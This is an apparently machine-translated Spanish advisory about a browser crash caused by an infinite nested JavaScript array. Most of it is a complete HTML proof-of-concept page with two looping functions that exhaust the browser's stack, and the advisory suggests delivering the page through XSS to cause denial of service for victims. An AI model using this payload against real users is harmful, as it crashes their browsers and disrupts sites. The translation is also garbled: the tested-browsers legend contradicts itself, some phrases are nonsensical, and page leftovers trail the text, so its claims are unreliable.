##################################################
Múltiples navegadores son vulnerables a un debordamiento de pila con un array infinito en Javascript
##################################################
############
Descripción
############
Múltiples navegadores son vulnerables a un desbordamiento de pila
o accidente a través de un array infinito en el motor de Javascript.
Se trata de una investigación ampliada de esta vulnerabilidad // para explotar:
http://www.securityfocus.com/bid/31703
Este problema se puede utilizar, por ejemplo, en una web vulnerables a ataques XSS o
similares para hacer un DoS a la web de los navegadores de la web de la víctima.
################
Navegadores probados:
################
Fail = No afectados
Pass = ¿No afecta?
#####################
Pruebas
#####################
.: [-Múltiples Navegadores de infinita gama PoC Por Lostmon -]:.
Aquí tienes dos variantes de este array SAV en este archivo:
#####################################
<html>
<head>
<title>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</title>
<script type=»text/javascript»>
function infinite_array()
{
foo = new Array();
alert(‘infinite array’);
while(true) {foo = new Array(foo);}
}
function infinite_array2()
{
foo = new Array();
alert(‘Infinite array with sort()’);
while(true) {foo = new Array(foo).sort();}
}
</script>
</head>
<body>
<h3>.:[-Multiple Browsers infnite array PoC By Lostmon -]:.</h3>
<input type=»button» value=»Infinite array Without sort()» onclick=»infinite_array();» />
<input type=»button» value=»Infinite array with sort()» onclick=»infinite_array2();» />
</body></html>
####################################
###############
Stack Overflow
###############
Comentarios recientes